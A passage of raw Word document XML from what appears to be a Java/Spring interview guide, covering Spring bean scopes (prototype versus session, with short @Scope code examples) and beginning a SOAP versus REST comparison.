          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="218ACEAD" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49845C20" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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quest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75CF01F3" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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e instance per HTTP request (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="4300B65C" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65277F03" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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ssion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="374090D3" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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e instance per HTTP session (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w14:paraId="4B89C4FE" w14:textId="77777777" w:rsidTr="00DF5D94">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D60BABF" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D9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pplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E8E443" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF5D94" w:rsidP="00DF5D94">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e instance per ServletContext (web apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F571844" w14:textId="77777777" w:rsidR="00DF5D94" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF5D9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99350E5">
          <v:rect id="_x0000_i2093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F91682" w14:textId="2604CF2E" w:rsidR="00EB2AAE" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc196307912"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between session and prototype scope?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w14:paraId="78B75682" w14:textId="5F8E2F82" w:rsidR="00D9644F" w:rsidRPr="0033120A" w:rsidRDefault="00D9644F" w:rsidP="00B27185">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033120A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="0033120A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Overview</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4"/>
        <w:gridCol w:w="4510"/>
        <w:gridCol w:w="4160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="3AC6E9D4" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C7EABDE" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12943A32" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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rototype Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B893BC5" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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ession Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="54A5729A" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C054E1E" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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pplies To</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7292C883" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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l types of applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04232DEC" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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eb applications only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="2139F81D" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2A5CCD" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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stance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76372306" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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new instance is created every time it's requested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C47955D" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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new instance per HTTP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="5B1AA9BE" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F03685" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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naged By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="656858D1" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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does not manage complete lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F243538" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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manages the bean for the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="47AC36DC" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EEB65E" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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vailability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68D6ED8B" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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vailable wherever beans are injected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1863CC95" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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vailable only during the user session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="5688F326" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C181BF" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E9B3E78" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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stateful beans or objects needing frequent fresh instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B889BE" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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storing user-specific data like preferences, carts, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE4CA53" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9644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47C914F">
          <v:rect id="_x0000_i2094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32C3F9" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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prototype Scope – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659A4A9" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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3311659"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EC294" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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3311659"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scop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rototype"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BAA23" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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3311659"/>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PrototypeBea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6CB0305" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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33116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PrototypeBea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53F856D" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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33116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rototype bean created"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE5952" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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331165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DE629E3" w14:textId="1533D6BD" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D964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3311659"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BB4A7" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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ch time you call applicationContext.getBean(MyPrototypeBean.class), a new instance will be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE348D" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9644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9DF5572">
          <v:rect id="_x0000_i2095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2BC73" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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ession Scope – Example (Spring MVC / Web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69930C0C" w14:textId="77777777" w:rsidR="00B06B82" w:rsidRPr="00CE4B95" w:rsidRDefault="00B06B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484715"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49420C50" w14:textId="77777777" w:rsidR="00B06B82" w:rsidRPr="00CE4B95" w:rsidRDefault="00B06B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484715"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scope</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valu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sess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roxyMod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copedProxyMod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ARGET_CLASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF3EBE" w14:textId="77777777" w:rsidR="00B06B82" w:rsidRPr="00CE4B95" w:rsidRDefault="00B06B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484715"/>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SessionBea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076C528" w14:textId="77777777" w:rsidR="00B06B82" w:rsidRPr="00CE4B95" w:rsidRDefault="00B06B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48471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userData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC3227" w14:textId="101DF23E" w:rsidR="00B06B82" w:rsidRPr="00CE4B95" w:rsidRDefault="00B06B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484715"/>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7645D5D4" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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creates one instance per user session, which is destroyed when the HTTP session ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70291907" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9644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7DDD6C5">
          <v:rect id="_x0000_i2096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B21AD9" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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Lifecycle Difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BCFA09" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> beans are not fully managed by Spring — you are responsible for cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0E0D7" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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ssion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> beans are managed by Spring WebContext and are automatically destroyed with the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E9370" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9644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4853409">
          <v:rect id="_x0000_i2097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B08ED" w14:textId="0ED2E19B" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B06B82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1252C0" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644F">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In non-web applications, session scope won’t work and will throw an error. Stick with singleton or prototype in such cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD63BE" w14:textId="77777777" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D9644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52A0966">
          <v:rect id="_x0000_i2098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D81641" w14:textId="5E5766EF" w:rsidR="00276440" w:rsidRPr="00CE4B95" w:rsidRDefault="00276440">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc196307913"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between SOAP and REST? Which is more efficient?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w14:paraId="1480F79B" w14:textId="5EC3D0F2" w:rsidR="001A6DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6DBB" w:rsidP="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F8CCA7"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SOAP (Simple Object Access Protoco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6"/>
        <w:gridCol w:w="6220"/>
      </w:tblGrid>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="43FD5101" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD01682" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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22FC4C06" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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395F6D" w:rsidRPr="00CE4B95" w14:paraId="4950E1E4" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
